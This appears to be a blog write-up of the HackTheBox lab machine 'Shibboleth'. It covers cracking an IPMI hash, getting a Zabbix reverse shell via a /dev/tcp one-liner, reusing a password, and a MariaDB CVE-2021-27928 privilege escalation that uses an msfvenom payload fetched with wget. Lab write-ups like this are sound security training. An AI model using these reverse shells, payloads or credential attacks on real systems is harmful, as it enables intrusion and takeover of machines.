HackTheBox - Shibboleth

Posted on Sat, Apr 2, 2022 Writeup HackTheBox IPMI Zabbix CVE-2021-27928

0x0 - Info card

0x1 - Network enumeration

Port scanning with nmap TCP/UDP

We are going to enumerate open port using tcp on the remote machine

nmap -sCV shibboleth.htb -T4

Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.12s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

Strange there is only one http service

And here we are going to enumerate open port udp on the remote machine

sudo nmap -sU -sCV shibboleth.htb -T4


PORT      STATE         SERVICE  VERSION
53/udp    open|filtered domain
623/udp   open          asf-rmcp
764/udp   open|filtered omserv
16786/udp open|filtered unknown
19294/udp open|filtered unknown
19500/udp open|filtered unknown
21186/udp open|filtered unknown
21967/udp open|filtered unknown
31059/udp open|filtered unknown
49186/udp open|filtered unknown
49188/udp open|filtered unknown
51255/udp open|filtered unknown
58797/udp open|filtered unknown
1 service unrecognized despite returning data. If you know the service/version, pleasesubmit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.92%I=7%D=2/10%Time=620533C5%P=x86_64-pc-linux-gnu%r(ipm
SF:i-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\x01
SF:\x97\x04\x03\0\0\0\0\t");

The port 623 is interesting they use IPMI and BMC Remote Management Control Protocol, very common in companies

IPMI: Intelligent Platform Management Interface

BMC: Baseboard management controller

More info:

Intelligent Platform Management Interface - Wikipédia

L'Interface de gestion intelligente de matériel, (ou IPMI, Intelligent Platform Management Interface) est un ensemble de spécifications d' interfaces pour un composant autonome des serveurs informatiques. Ce composant est un ordinateur (parfois utilisant un noyau Linux) indépendant du processeur, des firmwares ( BIOS, UEFI), du système d'exploitation du système hôte.

we are going to see what we can do with it later...

0x2 - Web server enumeration (80/tcp)

feroxbuster -u http://shibboleth.htb/ -w 
/usr/share/dirbuster/directory-list-2.3-medium.txt -x php,sql,txt

After a little reconnaissance and manual enumeration I found nothing interesting or concrete

By bruteforcing the available subdomains we find three subdomains

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://shibboleth.htb/ -H 'Host: FUZZ.shibboleth.htb' -fc 302

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://shibboleth.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.shibboleth.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 302
________________________________________________

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

We can access them by putting them in our /etc/hosts

Again a feature used in business,... Zabbix !

Zabbix is an open source software for monitoring the status of various network services, servers and other network hardware

But we will need credentials, Let's look at IPMI services

0x3 - Pentesting 623/UDP/TCP - IPMI

There is a lot of enumeration availability like ipmitool or there are also metasploits modules

623/UDP/TCP - IPMI

allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations. Note that to exploit this issue you first need tofind a valid user.

A Penetration Tester's Guide to IPMI and BMCs | Rapid7 Blog

Dan Farmer is known for his groundbreaking work on security tools and processes. Over the last year, Dan has identified some serious security issues with the Intelligent Platform Management Interface (IPMI) protocol and the Baseboard Management Controllers (BMCs) that speak it.

By testing some modules I could get the hash of "Administrator" via the ipmi_dumphashes module

hashcat -m 7300 -a 0 ipmi_hash /home/nuts/Downloads/rockyou.txt --force
af54fcaf842d0000b8a043c30ab8e70d2ee75fcb53b6c45726b7aa3
dbe42e6c892503c8a9ca3d445a123456789abcdefa123456789abcd
ef140d41646d696e6973747261746f72:d7a75db0374861a5d31ebe
0413c440e652db2dac:ilovepumkinpie1

We can enum other user with ipmitool

ipmitool -U "Administrator" -P "ilovepumkinpie1" -H shibboleth.htb user list
ID  Name        Callin  Link Auth    IPMI Msg   Channel Priv Limit
1                    true    false      false      USER
2   Administrator    true    false      true       ADMINISTRATOR
3   backdoor         true    false      true       ADMINISTRATOR
IPMI & IPMITOOL Cheat sheet - Knowledgebase - tzulo, inc.

The Intelligent Platform Management Interface (IPMI) is a standardized computer system interface used by system administrators for out-of-band management of computer systems and monitoring of their operation. Out-of-band is also referred to as LOM (Lights-out management) involves the use of a dedicated management channel for device maintenance.There are number of options available to manage the device remotely.

Access to zabbix panel

Now we have credentials we can try to access to zabbix panel

here we go !

0x4 - FootHold

Now that we are on the panel we can have a reverse shell from zabbix

To do this, you have to create an item of a host so that an agent can execute system.run[]

Prevention here I use nohup and I execute the reverse shell in background because otherwise the agent connection closes after 3 seconds

system.run[bash -c 'nohup bash -i >& /dev/tcp/10.10.14.158/4444 0>&1 &']

Horizontal privesc (zabbix to ipmi-svc)

This elevation of privilege is caused by the fact that the user was doing what we call password reuse so we just have to authenticate with the password found before

[email protected]:/$ su ipmi-svc
su ipmi-svc
Password: ilovepumkinpie1
id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)

0x5 - Vertical privesc (ipmi-svc to root)

We can find databases credentials in the zabbix server configuration file

[email protected]:/$ cat /etc/zabbix/zabbix_server.conf | grep "DBPass*\|DBUser*"
cat /etc/zabbix/zabbix_server.conf | grep "DBPass*\|DBUser*"
### Option: DBUser
# DBUser=
DBUser=zabbix
### Option: DBPassword
DBPassword=bloooarskybluh

zabbix:bloooarskybluh

dont forget to spawn a tty for connecting to mysql python3 -c 'import pty;pty.spawn("/bin/bash")’

The machine uses mariaDB, by enumerating we can see that the mariaDB version is vulnerable to a flaw

[email protected]:/$ mysql -u zabbix -pbloooarskybluh
mysql -u zabbix -pbloooarskybluh
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 856
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SELECT @@version;
SELECT @@version;
+----------------------------------+
| @@version                        |
+----------------------------------+
| 10.3.25-MariaDB-0ubuntu0.20.04.1 |
+----------------------------------+
1 row in set (0.000 sec)

CVE-2021-27928

The target is vulnerable to CVE-2021-27928

Let's go for a proof of concept of this cve

Step 1: Create the reverse shell payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

Step 2: Start listener

nc -lnvp <port>

Step 3: Copy the payload to the target machine

# local machine
sudo python3 -m http.server 80

# remote machine
/tmp: wget 1.1.1.1/CVE-2021-27928.so

Step 4: Execute the payload

mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

0x6 - Champagne